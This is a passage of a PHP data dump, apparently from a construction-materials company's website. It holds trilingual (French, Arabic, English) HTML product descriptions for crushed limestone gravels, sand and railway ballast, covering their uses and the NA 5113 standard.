'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:20px"><strong><span style="color:#008000"><small><u> </u></small></span></strong></span><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="font-size:20px"><strong><span style="color:#008000"><small><span style="font-family:times new roman,times,serif">:</span></small></span></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <span style="color:#000000"> <strong> الأعمال المدنية</strong></span></span></span></li>
<li style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The<strong> Gravel 4/8 mm </strong>is<strong> </strong>used bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</span></span></p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> </span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>Recommendations</strong></u><strong> :</strong></span></span></span></small></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611822434.png',
'img_prd_detail' => '',
'Code_Pr' => '485',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611737456.pdf',
'pos_slider' => '6'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 2 => array(
'Produit' => array(
'id' => '489',
'nom_fr' => 'Gravier',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '15/25 mm',
'sous_nom_ara' => ' 25/15 مم',
'sous_nom_en' => '15/25 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Gravier</strong> <strong>15/25 mm</strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Gravier</strong> <strong>15/25 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Gravier</strong> <strong>15/25 mm</strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></strong><span style="font-size:18px"><strong><small> :</small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></span></span></strong></li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <u><span style="color:#008000"><strong> </strong></span></u></span></span><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm </span></small></strong><small><span style="font-size:16px">is u</span></small></span>sed bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span></p>
</li>
</ul>
<ul>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong> Hydraulic Concrete</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><u><strong>Recommendations:</strong></u></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611736339.png',
'img_prd_detail' => '',
'Code_Pr' => '489',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611736339.pdf',
'pos_slider' => '4'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 3 => array(
'Produit' => array(
'id' => '959',
'nom_fr' => 'Sable Concassé ',
'nom_ara' => 'حصى ',
'nom_en' => 'Gravel ',
'sous_nom_fr' => ' 0/4 mm',
'sous_nom_ara' => ' مم 0/4',
'sous_nom_en' => '0/4 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm </strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Sable Concassé 0/4 mm </strong></span><strong> </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Mortiers</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Sable Concassé 0/4 mm </strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Sable Concassé 0/4 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Sable Concassé 0/4 mm </strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="font-size:18px"><span style="color:#008000"><strong><small><span style="font-family:times new roman,times,serif">:</span></small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> مدافع الهاون</span></span></strong></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></li>
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> <span style="font-size:16px"><span style="font-family:times new roman,times,serif">is controlled according to the <strong>NA 5113</strong> Standard.</span></span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm </span></small></strong><small><span style="font-size:16px">is u</span></small></span>sed bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Civil Engineering Work</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Mortars</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Hydraulic Concrete</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><strong><u>Recommendations</u> :</strong></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 0/4 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 0/4 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
</div>
',
'img_prd' => 'produit-1611822601.png',
'img_prd_detail' => '',
'Code_Pr' => '959',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611738453.pdf',
'pos_slider' => '7'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 4 => array(
'Produit' => array(
'id' => '9959',
'nom_fr' => 'Gravier Ballast',
'nom_ara' => ' حصى الصابورة Ballast حصى',
'nom_en' => 'Gravel Ballast',
'sous_nom_fr' => '25/50 mm',
'sous_nom_ara' => '50/25 مم',
'sous_nom_en' => '25/50 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong> est </span>le lit de pierres ou de graviers sur lequel repose une voie de chemin de fer.</span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif">désigne le mélange de cailloux et de sable répandu sur le sol, sous la voie ferrée. Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> est entré dans l’usage et a supplanté ensablement. </span></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Les éléments du <strong>Gravier Ballast </strong></span></span><span style="font-family:times new roman,times,serif"><span style="color:#000000"> généralement utilisés: de la pierre concassée, de </span><a href="https://fr.wikipedia.org/wiki/Granulom%C3%A9trie" title="Granulométrie"><span style="color:#000000">g</span></a><span style="color:#000000">ranulométrie variant entre 31,5 et 50 mm. Le type de roches utilisées varie suivant les régions et pays en fonction du climat. On trouve des roches de type plutonique : granite, diorite, etc. </span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Les éléments du </span></span><span style="color:#000000"><span style="font-family:times new roman,times,serif"><strong>Gravier Ballast </strong> doivent s'imbriquer de façon à former une masse compacte mais perméable.</span></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></span></p>
<p><span style="color:#008000"><u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Utilisations</span></span></strong></u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></strong></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong></span></span><span style="font-family:times new roman,times,serif"><strong> </strong>est utilisé dans les :</span></span> </p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><strong>Voies Ferroviaires<em> </em></strong></span></small></span></span></p>
</li>
</ul>
<p><span style="color:#008000"><span style="font-size:16px"><u><strong><span style="font-family:times new roman,times,serif">Contraintes</span></strong></u><strong><span style="font-family:times new roman,times,serif"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> subit deux types d'usure :</span></span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Contamination par des matériaux parasites, par exemple de la terre. On procède à des désherbages, mais il est nécessaire de remplacer le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> régulièrement ;</span></span></span></p>
</li>
<li>
